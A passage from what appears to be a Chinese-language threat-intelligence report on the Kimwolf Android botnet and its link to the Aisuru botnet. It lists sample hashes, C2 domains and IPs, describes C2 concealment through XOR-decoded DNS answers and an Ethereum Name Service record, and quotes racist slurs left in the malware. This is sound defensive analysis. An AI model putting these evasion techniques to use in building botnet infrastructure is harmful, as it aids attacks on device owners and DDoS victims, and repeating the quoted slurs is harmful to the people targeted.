<li>&#x67D0;&#x77E5;&#x540D;&#x4E91;&#x670D;&#x52A1;&#x5546;&#x5728;12&#x6708;9&#x65E5;09:35Z&#x89C2;&#x6D4B;&#x5230;&#x7684;&#x4E00;&#x8D77;&#x63A5;&#x8FD1;30Tbps&#xFF0C;2.9Gpps&#x653B;&#x51FB;&#xFF0C;&#x7ECF;&#x8FC7;&#x6570;&#x636E;&#x6BD4;&#x4E4B;&#x540E;&#xFF0C;&#x53CC;&#x65B9;&#x786E;&#x5B9A;Kimwolf&#x53C2;&#x4E0E;&#x5176;&#x4E2D;&#x3002;</li>
<li>Cloudflare&#x5728;&#x5176;2025&#x7B2C;&#x4E09;&#x5B63;&#x5EA6;&#x7684;DDoS&#x5A01;&#x80C1;&#x62A5;&#x544A;&#x6307;&#x51FA;Aisuru&#x662F;&#x76EE;&#x524D;&#x5DF2;&#x77E5;&#x653B;&#x51FB;&#x80FD;&#x529B;&#x6700;&#x5F3A;&#x7684;&#x50F5;&#x5C38;&#x7F51;&#x7EDC;&#x4E4B;&#x4E00;&#xFF0C;&#x63A7;&#x5236;&#x89C4;&#x6A21;&#x8FBE;&#x767E;&#x4E07;&#x7EA7; IoT/&#x7F51;&#x7EDC;&#x8BBE;&#x5907;&#xFF0C;&#x53EF;&#x6301;&#x7EED;&#x53D1;&#x52A8; Tbps &#x7EA7; &#x4E43;&#x81F3;&#x5CF0;&#x503C;&#x63A5;&#x8FD1; 30 Tbps&#x3001;10+ Bpps &#x7684;&#x8D85;&#x5927;&#x89C4;&#x6A21; DDoS &#x653B;&#x51FB;&#x3002;</li>
</ul>
<p>&#x5B9E;&#x9645;&#x4E0A;&#xFF0C;&#x6211;&#x4EEC;&#x8BA4;&#x4E3A;Cloudflare&#x89C2;&#x6D4B;&#x5230;&#x591A;&#x8D77;&#x88AB;&#x5F52;&#x56E0;&#x4E8E;Aisuru&#x7684;&#x653B;&#x51FB;&#x80CC;&#x540E;&#xFF0C;&#x53EF;&#x80FD;&#x5E76;&#x975E;&#x53EA;&#x6709;Aisuru&#x4E00;&#x4E2A;&#x50F5;&#x5C38;&#x7F51;&#x7EDC;&#x5728;&#x6D3B;&#x52A8;&#xFF0C;Kimwolf&#x4E5F;&#x53EF;&#x80FD;&#x53C2;&#x4E0E;&#x5176;&#x4E2D;&#xFF0C;&#x751A;&#x81F3;&#x662F;&#x7531;Kimwolf&#x4E3B;&#x5BFC;&#x3002;&#x8FD9;&#x4E24;&#x5927;&#x50F5;&#x5C38;&#x7F51;&#x7EDC;&#x5728;9&#x6708;&#x81F3;11&#x6708;&#x671F;&#x95F4;&#x901A;&#x8FC7;&#x76F8;&#x540C;&#x7684;&#x611F;&#x67D3;&#x811A;&#x672C;&#x4F20;&#x64AD;&#xFF0C;&#x5171;&#x5B58;&#x4E8E;&#x540C;&#x4E00;&#x6279;&#x8BBE;&#x5907;&#x4E2D;&#xFF0C;&#x5B83;&#x4EEC;&#x5176;&#x5B9E;&#x96B6;&#x5C5E;&#x4E8E;&#x540C;&#x4E00;&#x4E2A;&#x9ED1;&#x5BA2;&#x56E2;&#x4F19;&#x3002;</p>
<h1 id="kimwolf%E4%B8%8Eaisuru%E5%85%B3%E8%81%94">Kimwolf&#x4E0E;Aisuru&#x5173;&#x8054;</h1>
<p>&#x6211;&#x4EEC;&#x662F;&#x5982;&#x4F55;&#x53D1;&#x73B0;Kimwolf&#x4E0E;Aisuru&#x7684;&#x5173;&#x8054;&#x5462;&#xFF1F;&#x4E00;&#x5207;&#x8981;&#x4ECE;10&#x6708;25&#x65E5;&#x6355;&#x83B7;&#x7684;APK&#x6837;&#x672C;&#xFF08;MD5: b688c22aabcd83138bba4afb9b3ef4fc&#xFF09;&#x8BF4;&#x8D77;&#xFF0C;&#x5B83;&#x7684;&#x6587;&#x4EF6;&#x540D;&#x4E0E;&#x5305;&#x540D;&#x5206;&#x522B;&#x4E3A;<code>aisuru.apk</code>&#x548C;<code>com.n2.systemservice0644</code>&#x3002;&#x8FD9;&#x4E2A;&#x6837;&#x672C;&#x5B9E;&#x73B0;&#x4E86;&#x4E00;&#x4E2A;&#x6076;&#x610F;&#x7684;Android&#x542F;&#x52A8;&#x63A5;&#x6536;&#x5668;&#xFF08;Boot Receiver&#xFF09;&#xFF0C;&#x80FD;&#x591F;&#x5728;&#x8BBE;&#x5907;&#x542F;&#x52A8;&#x5B8C;&#x6210;&#x540E;&#x81EA;&#x52A8;&#x8FD0;&#x884C;&#x3002;</p>
<p>&#x5176;&#x4E3B;&#x8981;&#x6076;&#x610F;&#x884C;&#x4E3A;&#x662F;&#xFF1A;&#x4ECE;&#x5E94;&#x7528;&#x81EA;&#x8EAB;&#x7684;<code>res/raw/</code>&#x8D44;&#x6E90;&#x76EE;&#x5F55;&#x4E2D;&#xFF0C;&#x63D0;&#x53D6;&#x4E00;&#x4E2A;&#x9884;&#x7F6E;&#x7684;&#x4E8C;&#x8FDB;&#x5236;&#x6587;&#x4EF6;&#xFF08;&#x901A;&#x8FC7;&#x8D44;&#x6E90;ID <code>R.raw.libniggakernel</code>&#x5F15;&#x7528;&#xFF09;&#xFF0C;&#x5E76;&#x5C06;&#x5176;&#x5199;&#x5165;&#x5E94;&#x7528;&#x6570;&#x636E;&#x76EE;&#x5F55;&#x4E0B;&#xFF0C;&#x547D;&#x540D;&#x4E3A;<code>niggakernel</code>&#xFF0C;&#x968F;&#x540E;&#x5C06;&#x8BE5;&#x6587;&#x4EF6;&#x6743;&#x9650;&#x8BBE;&#x7F6E;&#x4E3A;&#x53EF;&#x6267;&#x884C;&#x3002;&#x63A5;&#x7740;&#xFF0C;&#x6837;&#x672C;&#x4F1A;&#x5C1D;&#x8BD5;&#x901A;&#x8FC7;<code>su</code>&#x547D;&#x4EE4;&#x83B7;&#x53D6;root&#x6743;&#x9650;&#x6765;&#x6267;&#x884C;&#x6B64;&#x6076;&#x610F;&#x7A0B;&#x5E8F;&#xFF0C;&#x5B9E;&#x73B0;&#x6301;&#x4E45;&#x5316;&#x9A7B;&#x7559;&#x4E0E;&#x7CFB;&#x7EDF;&#x63A7;&#x5236;&#x3002;</p>
<p>&#x7ECF;&#x5206;&#x6790;&#xFF0C;&#x8FD9;&#x4E2A;&#x9884;&#x7F6E;&#x7684;&#x4E8C;&#x8FDB;&#x5236;&#x6587;&#x4EF6;<code>ji.so</code>&#xFF0C;&#x5B9E;&#x8D28;&#x4E0A;&#x5C31;&#x662F;&#x201C;kimwolf&#x201D;&#x6076;&#x610F;&#x8F6F;&#x4EF6;&#x3002;&#x4E4B;&#x524D;&#x5B89;&#x5168;&#x793E;&#x533A;&#x5411;&#x6211;&#x4EEC;&#x63D0;&#x4F9B;&#x7684;&#x6837;&#x672C;&#xFF0C;&#x6B63;&#x662F;&#x8BE5;&#x6587;&#x4EF6;&#x8131;&#x58F3;&#x540E;&#x7684;&#x7248;&#x672C;&#x3002;</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/12/kimwolf_1025apk.png" alt="&#x53F2;&#x4E0A;&#x6700;&#x75AF;&#xFF1A;&#x72EC;&#x5BB6;&#x63ED;&#x79D8;&#x611F;&#x67D3;&#x5168;&#x7403;180&#x4E07;Android&#x8BBE;&#x5907;&#x7684;&#x5DE8;&#x578B;&#x50F5;&#x5C38;&#x7F51;&#x7EDC;Kimwolf" loading="lazy"></p>
<p>&#x4EE5;&#x4E0A;&#x8FF0;APK&#x7684;&#x79CD;&#x79CD;&#x7279;&#x5F81;&#x4E3A;&#x7EBF;&#x7D22;&#xFF0C;&#x6211;&#x4EEC;&#x53D1;&#x73B0;APK&#xFF08;MD5:887747dc1687953902488489b805d965&#xFF09;&#x5177;&#x6709;&#x660E;&#x663E;&#x7684;&#x540C;&#x6E90;&#x7279;&#x5F81;&#xFF0C;&#x6BD4;&#x5982;&#x4F7F;&#x7528;&#x76F8;&#x540C;&#x7684;&#x8D44;&#x6E90;ID&#x540D;libniggakernel&#xFF0C;&#x76F8;&#x540C;&#x7684;&#x5305;&#x540D;systemservice0644&#xFF0C;Log&#x6807;&#x8BC6;&#x201C;LOL&#x201D;&#xFF0C;&#x9884;&#x7F6E;&#x6587;&#x4EF6;&#x540D;ji.so&#x7B49;&#x3002;</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/12/kimwolf_1018apk.png" alt="&#x53F2;&#x4E0A;&#x6700;&#x75AF;&#xFF1A;&#x72EC;&#x5BB6;&#x63ED;&#x79D8;&#x611F;&#x67D3;&#x5168;&#x7403;180&#x4E07;Android&#x8BBE;&#x5907;&#x7684;&#x5DE8;&#x578B;&#x50F5;&#x5C38;&#x7F51;&#x7EDC;Kimwolf" loading="lazy"></p>
<p>&#x4EE4;&#x6211;&#x4EEC;&#x60CA;&#x5947;&#x7684;&#x662F;&#xFF0C;&#x8FD9;&#x4E2A;APK&#x4E2D;&#x9884;&#x7F6E;&#x7684;3&#x4E2A;&#x4E8C;&#x8FDB;&#x5236;&#x6587;&#x4EF6;c0.so, ji.so, q8.so&#x5E76;&#x4E0D;&#x5C5E;&#x4E8E;kimwolf&#x5BB6;&#x65CF;&#xFF0C;&#x800C;&#x662F;AISURU&#x50F5;&#x5C38;&#x7F51;&#x7EDC;&#x3002;&#x5B83;&#x4EEC;&#x4E0E;&#x6211;&#x4EEC;9&#x6708;15&#x65E5;&#x5206;&#x6790;&#x62A5;&#x544A;&#x4E2D;&#x63D0;&#x53CA;&#x7684;&#x6837;&#x672C;053a0abe0600d16a91b822eb538987bca3f3ab55&#x4F7F;&#x7528;&#x76F8;&#x540C;&#x7684;<code>tiananmeng</code> C2&#x548C;Reporter&#x3002;</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/12/kimwolf_1018aisuru.png" alt="&#x53F2;&#x4E0A;&#x6700;&#x75AF;&#xFF1A;&#x72EC;&#x5BB6;&#x63ED;&#x79D8;&#x611F;&#x67D3;&#x5168;&#x7403;180&#x4E07;Android&#x8BBE;&#x5907;&#x7684;&#x5DE8;&#x578B;&#x50F5;&#x5C38;&#x7F51;&#x7EDC;Kimwolf" loading="lazy"></p>
<p>11&#x6708;29&#x65E5;&#xFF0C;&#x66F4;&#x591A;&#x8BC1;&#x636E;&#x6D6E;&#x51FA;&#x6C34;&#x9762;&#xFF0C;&#x4E24;&#x4E2A;&#x5148;&#x540E;&#x4ECE;&#x7F8E;&#x56FD;&#x4E0A;&#x4F20;&#x81F3;VirusTotal&#x7684;APK&#x6837;&#x672C;&#x4E0E;&#x4E0A;&#x9762;&#x4FE9;&#x4E2A;APK&#x9AD8;&#x6027;&#x76F8;&#x4F3C;&#x3002;&#x7ECF;&#x5206;&#x6790;&#xFF0C;&#x5B83;&#x4EEC;lib&#x76EE;&#x5F55;&#x4E2D;&#x7684;libdevice.so&#x5206;&#x522B;&#x5BF9;&#x5E94;&#x201C;kimwolf&#x201D;&#x548C;&#x201C;aisuru&#x201D;&#x65B0;&#x53D8;&#x79CD;&#x3002;</p>
<ul>
<li>
<p>902cf9a76ade062a6888851b9d1ed30d</p>
<p>&#x5BB6;&#x65CF;&#xFF1A;kimwolf</p>
<p>&#x5305;&#x540D;&#xFF1A;com.n2.systemservice063</p>
<p>so&#x6587;&#x4EF6;&#x76EE;&#x5F55;&#xFF1A;/lib/armeabi-v7a/libdevice.so</p>
</li>
<li>
<p>8011ed1d1851c6ae31274c2ac8edfc06 &#xFF0C;</p>
<p>&#x5BB6;&#x65CF;&#xFF1A;aisuru</p>
<p>&#x5305;&#x540D;&#xFF1A;com.n2.systemservice062</p>
<p>so&#x6587;&#x4EF6;&#x76EE;&#x5F55;&#xFF1A;/lib/armeabi-v7a/libdevice.so</p>
</li>
</ul>
<p>&#x66F4;&#x4E3A;&#x5173;&#x952E;&#x7684;&#x662F;&#xFF0C;&#x8FD9;&#x4FE9;&#x4E2A;APK&#x4F7F;&#x7528;&#x4E86;&#x76F8;&#x540C;&#x7684;&#x7B7E;&#x540D;&#x8BC1;&#x4E66;&#xFF0C;&#x8BC1;&#x4E66;SHA1&#x6307;&#x7EB9;&#x4E3A;<strong>182256bca46a5c02def26550a154561ec5b2b983</strong>&#x3002;&#x8BE5;&#x8BC1;&#x4E66;&#x7684;&#x5185;&#x5BB9;&#x7279;&#x5F81;&#xFF0C;&#x5982;<code>Common Name:John Dinglebert Dinglenut VIII VanSack Smith</code>&#x5177;&#x6709;&#x9AD8;&#x5EA6;&#x72EC;&#x7279;&#x6027;&#xFF0C;&#x5728;&#x4E92;&#x8054;&#x7F51;&#x4E0A;&#x5E76;&#x65E0;&#x516C;&#x5F00;&#x8BB0;&#x5F55;&#xFF0C;&#x7531;&#x6B64;&#x53EF;&#x4EE5;&#x5224;&#x65AD;&#xFF0C;&#x5B83;&#x4EEC;&#x51FA;&#x81EA;&#x540C;&#x4E00;&#x5F00;&#x53D1;&#x7EC4;&#x7EC7;&#x4E4B;&#x624B;&#x3002;</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/12/kimwolf_apkcertificate.png" alt="&#x53F2;&#x4E0A;&#x6700;&#x75AF;&#xFF1A;&#x72EC;&#x5BB6;&#x63ED;&#x79D8;&#x611F;&#x67D3;&#x5168;&#x7403;180&#x4E07;Android&#x8BBE;&#x5907;&#x7684;&#x5DE8;&#x578B;&#x50F5;&#x5C38;&#x7F51;&#x7EDC;Kimwolf" loading="lazy"></p>
<p>12&#x6708;8&#x65E5;&#xFF0C;&#x6211;&#x4EEC;&#x7EC8;&#x4E8E;&#x6709;&#x4E86;<strong>&#x4E00;&#x9524;&#x5B9A;&#x97F3;&#x7684;&#x8BC1;&#x636E;</strong>&#xFF0C;&#x5728;Downloaer&#x670D;&#x52A1;&#x5668;93.95.112.59&#x4E0A;&#x6355;&#x83B7;&#x7684;&#x811A;&#x672C;&#x4E2D;&#x76F4;&#x63A5;&#x5C06;kimwolf(mreo31.apk)&#x548C;aisuru(meow217)&#x5173;&#x8054;&#x5728;&#x4E00;&#x8D77;&#x3002;</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/12/kimwolf_dlscript.png" alt="&#x53F2;&#x4E0A;&#x6700;&#x75AF;&#xFF1A;&#x72EC;&#x5BB6;&#x63ED;&#x79D8;&#x611F;&#x67D3;&#x5168;&#x7403;180&#x4E07;Android&#x8BBE;&#x5907;&#x7684;&#x5DE8;&#x578B;&#x50F5;&#x5C38;&#x7F51;&#x7EDC;Kimwolf" loading="lazy"></p>
<p>&#x8C28;&#x614E;&#x7684;&#x8BFB;&#x8005;&#x6216;&#x8BB8;&#x4F1A;&#x95EE;&#xFF1A;&#x201C;&#x662F;&#x5426;&#x5B58;&#x5728;&#x4E00;&#x79CD;&#x53EF;&#x80FD;&#xFF0C;&#x5373;Aisuru&#x56E2;&#x4F19;&#x7684;&#x4EE3;&#x7801;&#x906D;&#x6CC4;&#x9732;&#x6216;&#x5DF2;&#x8F6C;&#x5356;&#x7ED9;&#x4E86;&#x7B2C;&#x4E09;&#x65B9;&#xFF1F;&#x201D;&#x5766;&#x767D;&#x800C;&#x8A00;&#xFF0C;&#x8FD9;&#x79CD;&#x53EF;&#x80FD;&#x6027;&#x786E;&#x5B9E;&#x5B58;&#x5728;&#x3002;&#x6240;&#x5E78;&#x7684;&#x662F;&#xFF0C;&#x4E0A;&#x8FF0;11&#x6708;29&#x65E5;&#x6355;&#x83B7;&#x7684;Aisuru&#x6837;&#x672C;&#xFF0C;&#x867D;&#x7136;C2&#x5730;&#x5740;&#x5DF2;&#x66F4;&#x65B0;&#xFF0C;&#x4F46;&#x4ECD;&#x590D;&#x7528;&#x4E86;&#x6B64;&#x524D;&#x540D;&#x4E3A;<code>tiananmeng</code>&#x7684;Reporter&#x3002;&#x57FA;&#x7840;&#x8BBE;&#x65BD;&#x7684;&#x590D;&#x7528;&#x5F3A;&#x6709;&#x529B;&#x5730;&#x6392;&#x9664;&#x4E86;&#x7B2C;&#x4E09;&#x65B9;&#x590D;&#x7528;&#x4EE3;&#x7801;&#x7684;&#x53EF;&#x80FD;&#x6027;&#x3002;<strong>&#x7EFC;&#x4E0A;&#xFF0C;&#x6211;&#x4EEC;&#x5728;&#x6280;&#x672F;&#x5C42;&#x9762;&#x6709;&#x9AD8;&#x5EA6;&#x7684;&#x4FE1;&#x5FC3;&#x5C06;Kimwolf&#x5F52;&#x5C5E;&#x4E8E;Aisuru&#x56E2;&#x4F19;</strong>&#x3002;</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/12/kimwolf_aisurunew.png" alt="&#x53F2;&#x4E0A;&#x6700;&#x75AF;&#xFF1A;&#x72EC;&#x5BB6;&#x63ED;&#x79D8;&#x611F;&#x67D3;&#x5168;&#x7403;180&#x4E07;Android&#x8BBE;&#x5907;&#x7684;&#x5DE8;&#x578B;&#x50F5;&#x5C38;&#x7F51;&#x7EDC;Kimwolf" loading="lazy"></p>
<h1 id="%E6%8A%80%E6%9C%AF%E7%BB%86%E8%8A%82">&#x6280;&#x672F;&#x7EC6;&#x8282;</h1>
<p>&#x6211;&#x4EEC;&#x6355;&#x83B7;&#x7684;Kimwolf&#x6837;&#x672C;&#x4E2D;&#x53EF;&#x4EE5;&#x5206;&#x6210;v4&#xFF0C;v5&#x4FE9;&#x4E2A;&#x5927;&#x7248;&#x672C;&#x3002;&#x5728;v4&#x4E2D;&#xFF0C;Kimwolf&#x7684;&#x4F5C;&#x8005;&#x6216;&#x662F;&#x51FA;&#x4E8E;&#x6076;&#x8DA3;&#x5473;&#xFF0C;&#x6216;&#x662F;&#x51FA;&#x4E8E;&#x8868;&#x8FBE;&#x653F;&#x6CBB;&#x6001;&#x5EA6;&#xFF0C;&#x559C;&#x6B22;&#x5728;&#x63A7;&#x5236;&#x53F0;&#x8F93;&#x51FA;&#x5404;&#x79CD;&#x4FE1;&#x606F;&#x3002;&#x4F8B;&#x5982;&#x5728;&#x6837;&#x672C;18dcf61dad028b9e6f9e4aa664e7ff92&#xFF0C;&#x8F93;&#x51FA;<code>$$ ForeheadSDK v2.0 Premium Edition $$</code>&#xFF1B;&#x6837;&#x672C;2078af54891b32ea0b1d1bf08b552fe8&#x8F93;&#x51FA;<code> Kim Jong-un Leads Our Nation to Strength. Long live our Supreme Leader!</code>&#x3002;&#x6700;&#x5938;&#x5F20;&#x7684;&#x662F;&#x6837;&#x672C;1c03d82026b6bcf5acd8fc4bcf48ed00&#xFF0C;&#x9664;&#x51FA;&#x8F93;&#x51FA;&#x4E00;&#x7CFB;&#x5217;&#x653F;&#x6CBB;&#x89C2;&#x70B9;&#xFF0C;&#x8FD8;&#x4E13;&#x95E8;&#x5632;&#x8BBD;&#x77E5;&#x540D;&#x7F51;&#x7EDC;&#x5B89;&#x5168;&#x8C03;&#x67E5;&#x8BB0;&#x8005;Krebs&#xFF0C;&#x79F0;&#x5176;&#x62E5;&#x6709;&#x201C;&#x5927;&#x8111;&#x95E8;&#x201D;&#xFF08;KREBSFIVEHEADFANCLUB&#xFF09;&#xFF0C;&#x751A;&#x81F3;&#x620F;&#x8C11;&#x5730;&#x8BA9;Xlab&#x56E2;&#x961F;&#x201C;&#x54C1;&#x5C1D;&#x7AE5;&#x5B50;&#x86CB;&#x201D;&#xFF08;VIRGINBOYEGGSFORXLAB&#xFF09;&#x3002;</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/12/kimwolf_console3.png" alt="&#x53F2;&#x4E0A;&#x6700;&#x75AF;&#xFF1A;&#x72EC;&#x5BB6;&#x63ED;&#x79D8;&#x611F;&#x67D3;&#x5168;&#x7403;180&#x4E07;Android&#x8BBE;&#x5907;&#x7684;&#x5DE8;&#x578B;&#x50F5;&#x5C38;&#x7F51;&#x7EDC;Kimwolf" loading="lazy"></p>
<p>Kimwolf&#x7684;&#x4F5C;&#x8005;&#x76F8;&#x5F53;&#x775A;&#x7726;&#x5FC5;&#x62A5;&#xFF0C;&#x6211;&#x4EEC;&#x62A2;&#x6CE8;&#x5176;C2&#x4E4B;&#x540E;&#xFF0C;&#x4ED6;&#x4EEC;&#x9A6C;&#x4E0A;&#x53CD;&#x51FB;&#xFF0C;&#x5728;ssl_socket&#x7684;DDoS&#x653B;&#x51FB;&#x65B9;&#x6CD5;&#x4E2D;&#xFF0C;&#x7559;&#x4E0B;&#x4E00;&#x4E2A;&#x201C;&#x5F69;&#x86CB;&#x201D;&#x5BF9;&#x4E2D;&#x56FD;&#x4EBA;&#x8FDB;&#x884C;&#x6C61;&#x540D;&#x5316;&#x3002;&#x5BF9;&#x6B64;&#xFF0C;&#x6211;&#x4EEC;&#x53EA;&#x60F3;&#x8BF4;&#xFF1A;&#x201C;&#x8FDF;&#x65E9;&#x5F97;&#x5403;&#x6211;&#x4EEC;&#x51E0;&#x8BB0;&#x94C1;&#x62F3;&#x201D;&#x3002;</p>
<pre><code>idontlikemchineseniggas
becausetheylikeitrealyoung
myniggatheylikeit131415.com
</code></pre>
<p>v4&#x4E0E;v5&#x7248;&#x672C;&#x7684;&#x6838;&#x5FC3;&#x6076;&#x610F;&#x529F;&#x80FD;&#x9AD8;&#x5EA6;&#x4E00;&#x81F4;&#xFF0C;&#x5176;&#x8FD0;&#x4F5C;&#x6D41;&#x7A0B;&#x5747;&#x53EF;&#x6982;&#x62EC;&#x4E3A;&#xFF1A;&#x6837;&#x672C;&#x5728;&#x53D7;&#x611F;&#x67D3;&#x8BBE;&#x5907;&#x542F;&#x52A8;&#x540E;&#xFF0C;&#x9996;&#x5148;&#x901A;&#x8FC7;&#x521B;&#x5EFA;&#x6587;&#x4EF6;socket&#x5B9E;&#x73B0;&#x5355;&#x4E00;&#x5B9E;&#x4F8B;&#xFF0C;&#x786E;&#x4FDD;&#x540C;&#x4E00;&#x8BBE;&#x5907;&#x4E0A;&#x4EC5;&#x6709;&#x4E00;&#x4E2A;&#x8FDB;&#x7A0B;&#x6301;&#x7EED;&#x8FD0;&#x884C;&#xFF1B;&#x968F;&#x540E;&#x89E3;&#x5BC6;&#x5185;&#x5D4C;&#x7684;C2&#x57DF;&#x540D;&#xFF0C;&#x5E76;&#x4E3A;&#x4E86;&#x89C4;&#x907F;&#x5E38;&#x89C4;&#x68C0;&#x6D4B;&#xFF0C;&#x4F7F;&#x7528;DNS-over-TLS&#x534F;&#x8BAE;&#x5411;&#x516C;&#x5171;DNS&#x670D;&#x52A1;&#xFF08;8.8.8.8&#x6216;1.1.1.1&#xFF09;&#x7684;853&#x7AEF;&#x53E3;&#x53D1;&#x8D77;&#x67E5;&#x8BE2;&#xFF0C;&#x4EE5;&#x83B7;&#x53D6;&#x771F;&#x5B9E;C2 IP&#xFF1B;&#x6700;&#x7EC8;&#x4E0E;&#x8BE5;IP&#x5EFA;&#x7ACB;&#x901A;&#x4FE1;&#x8FDE;&#x63A5;&#xFF0C;&#x8FDB;&#x5165;&#x7B49;&#x5F85;&#x72B6;&#x6001;&#xFF0C;&#x968F;&#x65F6;&#x51C6;&#x5907;&#x63A5;&#x6536;&#x5E76;&#x6267;&#x884C;&#x6765;&#x81EA;&#x63A7;&#x5236;&#x7AEF;&#x7684;&#x6307;&#x4EE4;&#x3002;</p>
<p>v4&#x4E0E;v5&#x7248;&#x672C;&#x6700;&#x663E;&#x8457;&#x7684;&#x533A;&#x522B;&#x5728;&#x4E8E;&#x83B7;&#x53D6;&#x771F;&#x5B9E;C2 IP&#x7684;&#x65B9;&#x5F0F;&#xFF1A;v4&#x7248;&#x672C;&#x76F4;&#x63A5;&#x4F7F;&#x7528;DNS&#x67E5;&#x8BE2;C2&#x57DF;&#x540D;&#x7684;A&#x8BB0;&#x5F55;&#xFF0C;&#x800C;v5&#x7248;&#x672C;&#x5728;&#x67E5;&#x8BE2;&#x5230;IP&#x540E;&#xFF0C;&#x8FD8;&#x9700;&#x8FDB;&#x884C;&#x5F02;&#x6216;&#x64CD;&#x4F5C;&#x3002;&#x4EE5;C2&#x57DF;&#x540D;<code>rtrdedge1.samsungcdn[.]cloud</code>&#x4E3A;&#x4F8B;&#xFF0C;&#x5176;&#x5728;12&#x6708;3&#x65E5;&#x89E3;&#x6790;&#x51FA;&#x7684;IP&#x4E3A;<code>44.7.0.45</code>&#xFF0C;&#x4E0E;<strong>0xce0491</strong>&#x5F02;&#x6216;&#x540E;&#x5F97;&#x5230;&#x771F;&#x5B9E;&#x7684;C2 IP<code>45.206.3.189</code>&#x3002;</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/12/kimwolf_realip.png" alt="&#x53F2;&#x4E0A;&#x6700;&#x75AF;&#xFF1A;&#x72EC;&#x5BB6;&#x63ED;&#x79D8;&#x611F;&#x67D3;&#x5168;&#x7403;180&#x4E07;Android&#x8BBE;&#x5907;&#x7684;&#x5DE8;&#x578B;&#x50F5;&#x5C38;&#x7F51;&#x7EDC;Kimwolf" loading="lazy"></p>
<p>12&#x6708;12&#x65E5;Kimwolf&#x5F00;&#x59CB;&#x4F7F;&#x7528;<strong>EtherHiding&#x6280;&#x672F;</strong>&#xFF0C;&#x6837;&#x672C;&#x4E86;&#x5F15;&#x5165;&#x4E00;&#x4E2A; ENS &#x57DF;&#x540D;&#xFF08;Ethereum Name Service&#xFF0C;&#x4EE5;&#x592A;&#x574A;&#x540D;&#x79F0;&#x670D;&#x52A1;&#xFF09;&#xFF0C;<strong>pawsatyou.eth</strong>&#xFF0C;C2&#x9690;&#x85CF;&#x5728;&#x201C;lol&#x201D;&#x7684;&#x6587;&#x672C;&#x8BB0;&#x5F55;&#x3002;</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/12/kimwolf_enslol.png" alt="&#x53F2;&#x4E0A;&#x6700;&#x75AF;&#xFF1A;&#x72EC;&#x5BB6;&#x63ED;&#x79D8;&#x611F;&#x67D3;&#x5168;&#x7403;180&#x4E07;Android&#x8BBE;&#x5907;&#x7684;&#x5DE8;&#x578B;&#x50F5;&#x5C38;&#x7F51;&#x7EDC;Kimwolf" loading="lazy"><br>
&#x4F46;&#x771F;&#x5B9E;C2&#x5E76;&#x4E0D;&#x662F;&quot;lol&quot;&#x4E2D;&#x7684;IPV6&#xFF0C;&#x800C;&#x662F;&#x53D6;&#x5730;&#x5740;&#x7684;&#x540E;4&#x5B57;&#x8282;&#x518D;&#x8FDB;&#x884C;&#x5F02;&#x6216;&#x540E;&#x5F97;&#x5230;&#x771F;&#x5B9E;IP&#x3002;&#x4EE5;<code>fed0:5dec:ea5e:d013:130:9:1be7:8599</code>&#x4E3A;&#x4F8B;&#xFF0C;&#x53D6;&#x540E;4&#x5B57;&#x8282;<strong>1b e7 85 99</strong>&#x4E0E;<strong>0x93141715</strong>&#x540E;&#x5F97;&#x5230;&#x771F;&#x5B9E;C2 IP<code>136.243.146.140</code>&#x3002;</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/12/kimwolf_decipv6.png" alt="&#x53F2;&#x4E0A;&#x6700;&#x75AF;&#xFF1A;&#x72EC;&#x5BB6;&#x63ED;&#x79D8;&#x611F;&#x67D3;&#x5168;&#x7403;180&#x4E07;Android&#x8BBE;&#x5907;&#x7684;&#x5DE8;&#x578B;&#x50F5;&#x5C38;&#x7F51;&#x7EDC;Kimwolf" loading="lazy"></p>
<p>ENS&#x7684;&#x6280;&#x672F;&#x672C;&#x8D28;&#x662F;&#x4E00;&#x5957;&#x90E8;&#x7F72;&#x5728;&#x4EE5;&#x592A;&#x574A;&#x4E0A;&#x7684;&#x667A;&#x80FD;&#x5408;&#x7EA6;&#x7CFB;&#x7EDF;&#xFF0C;pawsatyou.eth&#x7684;&#x5408;&#x7EA6;&#x5730;&#x5740;&#x4E3A;0xde569B825877c47fE637913eCE5216C644dE081F&#x3002;&#x719F;&#x6089;&#x667A;&#x80FD;&#x5408;&#x7EA6;&#x7684;&#x8BFB;&#x8005;&#x4E0D;&#x96BE;&#x7406;&#x89E3;&#x8FD9;&#x4E00;&#x8BBE;&#x8BA1;&#x80CC;&#x540E;&#x7684;&#x4F18;&#x52BF;&#xFF1A;Kimwolf&#x901A;&#x8FC7;&#x5408;&#x7EA6;&#x5B9E;&#x73B0;&#x4E86;&#x4E00;&#x79CD;&#x7C7B;&#x4F3C;&#x4E91;&#x7AEF;&#x914D;&#x7F6E;C2&#x7684;&#x6E20;&#x9053;&#xFF0C;&#x5373;&#x4F7F;C2 IP&#x88AB;&#x5904;&#x7F6E;&#xFF0C;&#x653B;&#x51FB;&#x8005;&#x53EA;&#x9700;&#x66F4;&#x65B0;lol&#x8BB0;&#x5F55;&#x5C31;&#x80FD;&#x5FEB;&#x901F;&#x4E0B;&#x53D1;&#x65B0;&#x7684;C2&#x3002;&#x800C;&#x8FD9;&#x4E2A;&#x6E20;&#x9053;&#x672C;&#x8EAB;&#x4F9D;&#x6258;&#x4E8E;&#x533A;&#x5757;&#x94FE;&#x7684;&#x53BB;&#x4E2D;&#x5FC3;&#x5316;&#x7279;&#x6027;&#xFF0C;&#x4E0D;&#x53D7;&#x4EE5;&#x592A;&#x574A;&#x6216;&#x5176;&#x4ED6;&#x533A;&#x5757;&#x94FE;&#x8FD0;&#x8425;&#x65B9;&#x7684;&#x76D1;&#x7BA1;&#xFF0C;&#x4E5F;&#x65E0;&#x6CD5;&#x88AB;&#x963B;&#x65AD;&#x3002;</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/12/kimwolf_updatec2.png" alt="&#x53F2;&#x4E0A;&#x6700;&#x75AF;&#xFF1A;&#x72EC;&#x5BB6;&#x63ED;&#x79D8;&#x611F;&#x67D3;&#x5168;&#x7403;180&#x4E07;Android&#x8BBE;&#x5907;&#x7684;&#x5DE8;&#x578B;&#x50F5;&#x5C38;&#x7F51;&#x7EDC;Kimwolf" loading="lazy"></p>
